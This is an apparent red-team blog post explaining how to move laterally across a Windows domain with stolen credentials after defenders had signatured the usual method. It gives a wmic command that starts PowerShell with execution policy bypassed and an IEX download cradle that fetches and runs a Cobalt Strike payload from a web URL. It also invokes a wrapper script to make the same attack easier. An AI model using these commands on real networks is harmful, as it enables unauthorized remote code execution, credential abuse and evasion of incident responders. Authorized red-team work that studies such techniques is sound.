Powershell Web Drive By via Wmic?

I went on my first red team assessment not too long ago. I learned so much about tradecraft used to escalate privileges and move across a domain. I found that we often used the psexec-psh module in cobaltstrike to pivot around the network with stolen credentials. At one point during the assessment, the incident response team caught on and wrote signatures for our method of movement. We could no longer use the psexec-psh module. Shout out to a colleague (@cptjesus) of mine coming up with another way to pivot around the network. We could leverage the powershell web drive by module in Cobaltstrike with wmic. We would use wmic to create a powershell process, which in turn uses the IEX download cradle with our web drive by url. You can do this with:

wmic /node:<hostname/IP> /user: /password: process call create "powershell.exe -exec bypass -Command IEX (New-Object Net.webclient).Downloadstring(‘’)"


This would be slightly annoying to remember and type. I wrote a small powershell script that condenses the command and is much easier to remember. It uses the Invoke-WmiMethod in powershell to call wmic. To use the script you would just need to import the powershell script with “powershell-import”. Then run the command:

powershell Invoke-WmicPSDL -User “” -Pass “” -TARGET <hostname/IP address>


If the command is successful, you should see output from Wmic with a return value and a process ID. This is a lot easier to remember (at least for me anyway) and saves you some typing. You can find it on GitHub.

Written by Chris Ross on 04 March 2015